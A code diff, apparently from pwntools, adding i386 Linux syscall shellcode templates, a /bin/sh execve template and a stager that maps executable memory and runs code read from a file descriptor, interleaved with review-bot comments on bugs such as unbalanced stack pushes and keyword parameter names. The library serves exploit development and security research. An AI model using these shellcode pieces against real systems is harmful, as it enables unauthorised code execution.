b/pwnlib/shellcraft/templates/i386/linux/sethostname.asm new file mode 100644 index 000000000..0716109c5 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} 
diff --git a/pwnlib/shellcraft/templates/i386/linux/setitimer.asm b/pwnlib/shellcraft/templates/i386/linux/setitimer.asm new file mode 100644 index 000000000..add2bc5b0 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setpgid.asm b/pwnlib/shellcraft/templates/i386/linux/setpgid.asm new file mode 100644 index 000000000..5c9c426c5 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setpriority.asm b/pwnlib/shellcraft/templates/i386/linux/setpriority.asm new file mode 100644 index 000000000..57bfb3e73 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setresgid.asm b/pwnlib/shellcraft/templates/i386/linux/setresgid.asm new file mode 100644 index 000000000..23e457382 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setresgid.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setresuid.asm b/pwnlib/shellcraft/templates/i386/linux/setresuid.asm new file mode 100644 index 000000000..9777331b9 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setrlimit.asm b/pwnlib/shellcraft/templates/i386/linux/setrlimit.asm new file mode 100644 index 000000000..80c369fe2 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setsid.asm b/pwnlib/shellcraft/templates/i386/linux/setsid.asm new file mode 100644 index 000000000..f620fa05c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} 
diff --git a/pwnlib/shellcraft/templates/i386/linux/setsockopt.asm b/pwnlib/shellcraft/templates/i386/linux/setsockopt.asm new file mode 100644 index 000000000..bb4f82063 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setsockopt.asm @@ -0,0 +1,24 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall + from pwnlib.shellcraft.i386 import push + from pwnlib.constants import SOCK_STREAM, AF_INET, SYS_socketcall, SYS_socketcall_setsockopt +%> +<%page args="sockfd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall setsockopt. See 'man 2 setsockopt' for more information. + +Arguments: + sockfd(int): sockfd + level(int): level + optname(int): optname + optval(void): optval + optlen(int): optlen + + ${push(optlen)} + ${push(optval)} + ${push(optname)} + ${push(level)} + ${push(sockfd)} + ${syscall(SYS_socketcall, SYS_socketcall_setsockopt, 'esp', 0)} + diff --git a/pwnlib/shellcraft/templates/i386/linux/setsockopt_timeout.asm b/pwnlib/shellcraft/templates/i386/linux/setsockopt_timeout.asm new file mode 100644 index 000000000..8a66b2282 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setsockopt_timeout.asm @@ -0,0 +1,19 @@ + +<% + from pwnlib.shellcraft.i386.linux import setsockopt + from pwnlib.shellcraft.i386 import push + from pwnlib.constants import SOL_SOCKET, SO_RCVTIMEO +%> +<%page args="sock, secs"/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + sock(int): sock + secs(int): secs + + ${push(0)} + ${push(secs)} + mov edi, esp + ${setsockopt(sock, 'SOL_SOCKET', 'SO_RCVTIMEO', 'edi', 8)} + add esp, 28 diff --git a/pwnlib/shellcraft/templates/i386/linux/settimeofday.asm b/pwnlib/shellcraft/templates/i386/linux/settimeofday.asm new file mode 100644 index 000000000..794e70380 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/settimeofday.asm 
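Review bot: The five `push` lines leave 20 bytes on the stack after `${syscall(SYS_socketcall, SYS_socketcall_setsockopt, 'esp', 0)}` and nothing in this template reclaims them; the only visible caller, `setsockopt_timeout` in the next hunk, compensates with a hard-coded `add esp, 28` that silently depends on this count. Rebalancing here with `add esp, 20 /* drop the five socketcall arguments */` (and shrinking the timeout template's cleanup to its own 8 bytes) keeps each template self-contained; `socketcall.asm` further down has the same unbalanced-push shape with three arguments. The trailing `0` passed to `syscall` only clears edx, which socketcall does not read, and `SOCK_STREAM` and `AF_INET` are imported but never used.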
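Review bot: The docstring `Invokes the syscall fork. See 'man 2 fork' for more information.` does not describe this template, which builds a `struct timeval {secs, 0}` on the stack and applies it as the socket's receive timeout. Suggest `Sets a receive timeout of secs seconds on sock (setsockopt SOL_SOCKET/SO_RCVTIMEO with a struct timeval built on the stack).` with `sock(int): socket descriptor` and `secs(int): timeout in seconds` in the Arguments block. `SOL_SOCKET` and `SO_RCVTIMEO` are imported but the call passes them as string names, so the import is dead. The `add esp, 28` pairs 8 bytes of this template's own pushes with 20 pushed inside `setsockopt`; a comment stating that split, `add esp, 28 /* 8 (timeval) + 20 (setsockopt args) */`, would make the constant maintainable.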
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/i386/linux/setuid.asm b/pwnlib/shellcraft/templates/i386/linux/setuid.asm new file mode 100644 index 000000000..fe01101f1 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/setuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sh.asm b/pwnlib/shellcraft/templates/i386/linux/sh.asm index cb9ff8570..dd542938e 100644 --- a/pwnlib/shellcraft/templates/i386/linux/sh.asm +++ b/pwnlib/shellcraft/templates/i386/linux/sh.asm @@ -1,6 +1,11 @@ <% from pwnlib.shellcraft import i386 %> -<%docstring>Execute /bin/sh +<%docstring> +Execute a different process. -${i386.pushstr('/bin///sh')} + >>> p = run_assembly(shellcraft.i386.linux.sh()) + >>> p.sendline('echo Hello') + >>> p.recv() + 'Hello\n' -${i386.linux.syscall('SYS_execve', 'esp', 0, 0)} + +${i386.linux.execve('/bin///sh', 0, 0)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sigaction.asm b/pwnlib/shellcraft/templates/i386/linux/sigaction.asm new file mode 100644 index 000000000..c26634f72 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} 
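Review bot: The new docstring summary `Execute a different process.` no longer says what the template does: it always runs `/bin///sh` through `${i386.linux.execve('/bin///sh', 0, 0)}`, and the removed text `Execute /bin/sh` was accurate. Suggest keeping `Execute /bin/sh` as the first line with the new doctest beneath it. The doctest's `p.recv()` expects the whole `'Hello\n'` in a single read; `p.recvline()` would be less sensitive to how the child's output arrives.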
diff --git a/pwnlib/shellcraft/templates/i386/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/i386/linux/sigaltstack.asm new file mode 100644 index 000000000..d42f2fce1 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sigaltstack.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/i386/linux/signal.asm b/pwnlib/shellcraft/templates/i386/linux/signal.asm new file mode 100644 index 000000000..5f0dae86c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sigpending.asm b/pwnlib/shellcraft/templates/i386/linux/sigpending.asm new file mode 100644 index 000000000..82f7324b2 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/i386/linux/sigprocmask.asm new file mode 100644 index 000000000..3ffadad0f --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sigprocmask.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="how, set, oset"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + + + ${syscall('SYS_sigprocmask', how, set, oset)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/i386/linux/sigsuspend.asm new file mode 100644 index 000000000..0469e1503 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/i386/linux/socket.asm b/pwnlib/shellcraft/templates/i386/linux/socket.asm new file mode 100644 index 000000000..45fc3787d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/socket.asm @@ -0,0 +1,12 @@ +<% from pwnlib.shellcraft.i386.linux import socketcall %> +<% from pwnlib.constants import AF_INET, AF_INET6, SOCK_STREAM, SOCK_DGRAM, SYS_socketcall_socket %> +<% from pwnlib.util.net import sockaddr %> +<%page args="network = 'ipv4', proto = 'tcp'"/> +<%docstring> +Creates a new socket + +<% + address_family = {'ipv4':AF_INET,'ipv6':AF_INET6}.get(network, network) +%>\ + /* open new socket */ + ${socketcall(SYS_socketcall_socket, address_family, SOCK_STREAM, 0)} diff --git a/pwnlib/shellcraft/templates/i386/linux/socketcall.asm b/pwnlib/shellcraft/templates/i386/linux/socketcall.asm new file mode 100644 index 000000000..0c4b9a795 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/socketcall.asm 
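Review bot: The `proto` page argument is accepted but never used: the socketcall line always passes `SOCK_STREAM`, so `socket(proto='udp')` silently yields a TCP socket even though `SOCK_DGRAM` is imported for exactly that case. Mirror the `network` lookup with `socket_type = {'tcp':SOCK_STREAM,'udp':SOCK_DGRAM}.get(proto, proto)` inside the `<% %>` block and pass `socket_type` in place of `SOCK_STREAM`. `sockaddr` from `pwnlib.util.net` is imported but unused, and the docstring has no Arguments section; `network(str): 'ipv4' or 'ipv6', or an address-family constant` and `proto(str): 'tcp' or 'udp'` would match the other templates.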
@@ -0,0 +1,15 @@ +<% from pwnlib.shellcraft import common, pretty %> +<% from pwnlib.shellcraft.i386 import push %> +<% from pwnlib.shellcraft.i386.linux import syscall %> +<% from pwnlib.constants import SYS_socketcall %> + +<%page args="socketcall, socket, sockaddr, sockaddr_len"/> +<%docstring> +Invokes a socket call (e.g. socket, send, recv, shutdown) + + + /* socketcall(${pretty(socket,0)}, ${pretty(sockaddr,0)}, ${pretty(sockaddr_len,0)}) */ + ${push(sockaddr_len)} /* socklen_t addrlen */ + ${push(sockaddr)} /* sockaddr *addr */ + ${push(socket)} /* sockfd */ + ${syscall('SYS_socketcall', socketcall, 'esp')} diff --git a/pwnlib/shellcraft/templates/i386/linux/splice.asm b/pwnlib/shellcraft/templates/i386/linux/splice.asm new file mode 100644 index 000000000..cf2084813 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/stage.asm b/pwnlib/shellcraft/templates/i386/linux/stage.asm new file mode 100644 index 000000000..9207aceee --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/stage.asm 
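Review bot: The docstring advertises socket, send, recv and shutdown, but the page signature `socketcall, socket, sockaddr, sockaddr_len` fixes the argument block at exactly three slots named for connect/bind-style calls, so `send`/`recv` (four arguments) and `setsockopt` (five) cannot be expressed through it and the `socket.asm` caller has to pass `0` as a "sockaddr_len". Either document it as a three-argument socketcall helper, with the slot names made generic (`arg0, arg1, arg2`), or accept a variable argument list and push it in reverse. `common` is imported but unused, and the `/* socketcall(...) */` comment omits which socketcall number is being invoked; `/* socketcall(${pretty(socketcall,0)}, ...) */` would show it.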
@@ -0,0 +1,59 @@ +<% +from pwnlib.shellcraft.i386 import push +from pwnlib.shellcraft.i386.linux import read, readn, mmap +from pwnlib import constants as C +%> +<%page args="fd=0, length=None"/> +<%docstring> +Migrates shellcode to a new buffer. + +Arguments: + fd(int): + Integer file descriptor to recv data from. + Default is stdin (0). + length(int): + Optional buffer length. If None, the first pointer-width + of data received is the length. + +Example: + + >>> p = run_assembly(shellcraft.stage()) + >>> sc = asm(shellcraft.echo("Hello\n", constants.STDOUT_FILENO)) + >>> p.pack(len(sc)) + >>> p.send(sc) + >>> p.recvline() + 'Hello\n' + + +<% + protection = C.PROT_READ | C.PROT_WRITE | C.PROT_EXEC + flags = C.MAP_ANONYMOUS | C.MAP_PRIVATE + + assert isinstance(fd, int) +%> +%if length is None: + /* How many bytes should we receive? */ + ${read(fd, 'esp', 4)} + pop eax + push eax /* Save exact size */ +%else: + ${push(length)} +%endif + + /* Page-align */ + shr eax, 12 + inc eax + shl eax, 12 + + /* Map it */ + ${mmap(0, 'eax', protection, flags, 0, 0)} + + /* Grab the saved size, save the address */ + pop ebx + push eax + + /* Read in all of the data */ + ${readn(fd, 'eax', 'ebx')} + + /* Go to shellcode */ + ret diff --git a/pwnlib/shellcraft/templates/i386/linux/stat.asm b/pwnlib/shellcraft/templates/i386/linux/stat.asm new file mode 100644 index 000000000..b9161bf5b --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/i386/linux/stat64.asm b/pwnlib/shellcraft/templates/i386/linux/stat64.asm new file mode 100644 index 000000000..2be528e1d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/stat64.asm 
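Review bot: In the `%else:` branch `${push(length)}` saves the length on the stack but never loads it into eax, so the following `shr eax, 12` page-aligns whatever eax happened to hold and the `mmap` size is garbage whenever a caller passes `length`. Add `mov eax, [esp] /* keep eax in step with the saved size */` right after `${push(length)}` so both branches leave the size in eax and on the stack. `assert isinstance(fd, int)` raises a bare AssertionError for a wrong argument type and is stripped under `-O`; `raise TypeError('fd must be an int')` is the clearer contract. A docstring line noting that the receive buffer is mapped `PROT_READ | PROT_WRITE | PROT_EXEC` would save readers from re-deriving that from the constants.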
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/i386/linux/stime.asm b/pwnlib/shellcraft/templates/i386/linux/stime.asm new file mode 100644 index 000000000..720c58c12 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/i386/linux/stty.asm b/pwnlib/shellcraft/templates/i386/linux/stty.asm new file mode 100644 index 000000000..e600304ab --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/i386/linux/symlink.asm b/pwnlib/shellcraft/templates/i386/linux/symlink.asm new file mode 100644 index 000000000..585c267d7 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} diff --git a/pwnlib/shellcraft/templates/i386/linux/symlinkat.asm b/pwnlib/shellcraft/templates/i386/linux/symlinkat.asm new file mode 100644 index 000000000..087345774 --- /dev/null 
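Review bot: `SYS_stty` is one of the i386 syscall slots the kernel has never implemented (it is wired to `sys_ni_syscall` and returns ENOSYS), so this wrapper can only ever fail; `ulimit.asm` further down has the same problem. If these templates are produced by a generator from a header listing, consider filtering the unimplemented numbers, or at least note in the docstring that there is no kernel implementation behind the number.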
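Review bot: `<%page args="from, to"/>` uses `from`, a Python keyword, as a parameter name; Mako turns page arguments into Python identifiers in the generated module, so this template cannot compile and `shellcraft.i386.linux.symlink` will fail at load or first render. `symlinkat.asm` in the next hunk (`<%page args="from, tofd, to"/>`) has the same problem. Rename to `<%page args="target, linkpath"/>` (the `man 2 symlink` names), update the Arguments block, and change the call to `${syscall('SYS_symlink', target, linkpath)}`; a generator-side check that rejects keyword names would catch this for every architecture.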
+++ b/pwnlib/shellcraft/templates/i386/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/i386/linux/sync.asm b/pwnlib/shellcraft/templates/i386/linux/sync.asm new file mode 100644 index 000000000..6765173e8 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/i386/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/i386/linux/sync_file_range.asm new file mode 100644 index 000000000..b995a0ad5 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/syscall.asm b/pwnlib/shellcraft/templates/i386/linux/syscall.asm index 893875fde..676346c69 100644 --- a/pwnlib/shellcraft/templates/i386/linux/syscall.asm +++ b/pwnlib/shellcraft/templates/i386/linux/syscall.asm @@ -1,5 +1,5 @@ <% - from pwnlib.shellcraft import i386 + from pwnlib.shellcraft import i386, pretty from pwnlib.constants import Constant from pwnlib.abi import linux_i386_syscall as abi %> 
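Review bot: `offset` and `count` are declared `off64_t`, and on i386 a 64-bit syscall argument is passed as a low/high register pair, so as I read the kernel's i386 entry this call consumes six registers (fd, offset lo/hi, count lo/hi, flags) rather than the four values `${syscall('SYS_sync_file_range', fd, offset, count, flags)}` supplies; the high halves end up as whatever the later registers hold. `truncate64.asm` below (`length(off64_t)`) has the same shape. If the generator cannot split 64-bit values, a docstring note that callers must pass the two halves themselves would at least make the contract explicit.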
@@ -16,20 +16,20 @@ Example: /* call execve(1, 'esp', 2, 0) */ push (SYS_execve) /* 0xb */ pop eax - push 0x1 + push 1 pop ebx mov ecx, esp - push 0x2 + push 2 pop edx xor esi, esi int 0x80 >>> print pwnlib.shellcraft.i386.linux.syscall('SYS_execve', 2, 1, 0, 20).rstrip() - /* call execve(2, 1, 0, 20) */ + /* call execve(2, 1, 0, 0x14) */ push (SYS_execve) /* 0xb */ pop eax - push 0x2 + push 2 pop ebx - push 0x1 + push 1 pop ecx push 0x14 pop esi @@ -45,7 +45,7 @@ Example: >>> print pwnlib.shellcraft.i386.linux.syscall('ebp', None, None, 1).rstrip() /* call syscall('ebp', ?, ?, 1) */ mov eax, ebp - push 0x1 + push 1 pop edx int 0x80 >>> print pwnlib.shellcraft.i386.linux.syscall( @@ -53,7 +53,7 @@ Example: ... 'PROT_READ | PROT_WRITE | PROT_EXEC', ... 'MAP_PRIVATE | MAP_ANONYMOUS', ... -1, 0).rstrip() - /* call mmap2(0, 4096, 'PROT_READ | PROT_WRITE | PROT_EXEC', 'MAP_PRIVATE | MAP_ANONYMOUS', -1, 0) */ + /* call mmap2(0, 0x1000, 'PROT_READ | PROT_WRITE | PROT_EXEC', 'MAP_PRIVATE | MAP_ANONYMOUS', -1, 0) */ xor eax, eax mov al, 0xc0 xor ebp, ebp @@ -62,7 +62,7 @@ Example: mov ch, 0x1000 >> 8 push -1 pop edi - push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 0x7 */ + push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ pop edx push (MAP_PRIVATE | MAP_ANONYMOUS) /* 0x22 */ pop esi @@ -84,7 +84,7 @@ Example: if arg == None: args.append('?') else: - args.append(repr(arg)) + args.append(pretty(arg, False)) while args and args[-1] == '?': args.pop() syscall_repr = syscall_repr % ', '.join(args) diff --git a/pwnlib/shellcraft/templates/i386/linux/syslog.asm b/pwnlib/shellcraft/templates/i386/linux/syslog.asm new file mode 100644 index 000000000..e6f219b89 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/syslog.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/i386/linux/tee.asm b/pwnlib/shellcraft/templates/i386/linux/tee.asm new file mode 100644 index 000000000..03ed51c17 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/i386/linux/time.asm b/pwnlib/shellcraft/templates/i386/linux/time.asm new file mode 100644 index 000000000..3435b8536 --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/i386/linux/timer_create.asm b/pwnlib/shellcraft/templates/i386/linux/timer_create.asm new file mode 100644 index 000000000..dfa172e3f --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} 
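Review bot: The page signature `pri, fmt, vararg` is the libc `syslog(3)` prototype, not the kernel call the docstring points to: `man 2 syslog` documents `syslog(int type, char *bufp, int len)`, and that is what `SYS_syslog` expects. Because the values go straight into `${syscall('SYS_syslog', pri, fmt, vararg)}`, a caller following the docstring hands the kernel a format string as the buffer and a varargs count as its length. Suggest `<%page args="type, bufp, len"/>` with matching Arguments lines; the generator appears to have taken the wrong prototype from the headers here, so other templates produced the same way may deserve the same check.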
diff --git a/pwnlib/shellcraft/templates/i386/linux/timer_delete.asm b/pwnlib/shellcraft/templates/i386/linux/timer_delete.asm new file mode 100644 index 000000000..5975a8f7d --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/timer_delete.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/i386/linux/timer_getoverrun.asm new file mode 100644 index 000000000..66ee1351c --- /dev/null +++ b/pwnlib/shellcraft/templates/i386/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.i386.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/i386/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/i386/linux/timer_gettime.asm new file mode 100644 index 000000000..ca2cf4187 --- /dev/null +++ 